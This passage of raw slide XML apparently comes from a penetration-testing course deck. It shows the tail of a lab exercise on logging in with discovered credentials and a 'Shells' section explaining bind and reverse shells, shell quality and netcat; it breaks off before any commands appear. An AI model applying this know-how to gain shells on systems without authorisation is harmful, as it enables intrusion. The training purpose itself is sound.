                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Log in with what you found and confirm it works</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Bonus: open /var/log/auth.log on the target and count your failures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>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37</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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0B0711"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4297680" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="12082A"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2011680"/>
            <a:ext cx="3291840" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="2788920"/>
            <a:ext cx="6675120" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Shells</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983480" y="3657600"/>
            <a:ext cx="6583680" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Netcat, bind shells, reverse shells,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>and why one of them almost always wins.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>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38</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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05 / SHELLS</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What a shell is, and what makes one good</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39</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="11091672" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6087"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="1664208"/>
            <a:ext cx="10515600" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A shell is a program on the target that reads your commands and runs them. Getting a shell means the target is now taking instructions from your keyboard.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="2834640"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>THE TWO SHAPES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3200400"/>
            <a:ext cx="5394960" cy="2377440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Bind shell. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The target opens a port and waits. You connect to it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Reverse shell. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>You open a port and wait. The target connects to you.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Everything else is a variation. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Web shells, meterpreter and SSH are the same idea with more features.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="2834640"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>QUALITY OF SHELL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="3200400"/>
            <a:ext cx="5303520" cy="2377440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Dumb shell. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No arrows, no tab complete, Ctrl+C kills your session. What you get by default.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Interactive TTY. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A real terminal. Worth the two minutes it takes to upgrade.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Session. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Something you can background, resume and route traffic through. That is meterpreter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5943600"/>
            <a:ext cx="11064240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A shell is not the finish line. It is the moment your notes need to get serious.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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05 / SHELLS</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netcat: one tool, many jobs</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40</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1463040"/>
            <a:ext cx="11064240" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Netcat reads from the network and writes to your screen, and the other way around. That is all it does, and it is why it does everything.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2148840"/>
            <a:ext cx="5440680" cy="960120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="2276856"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
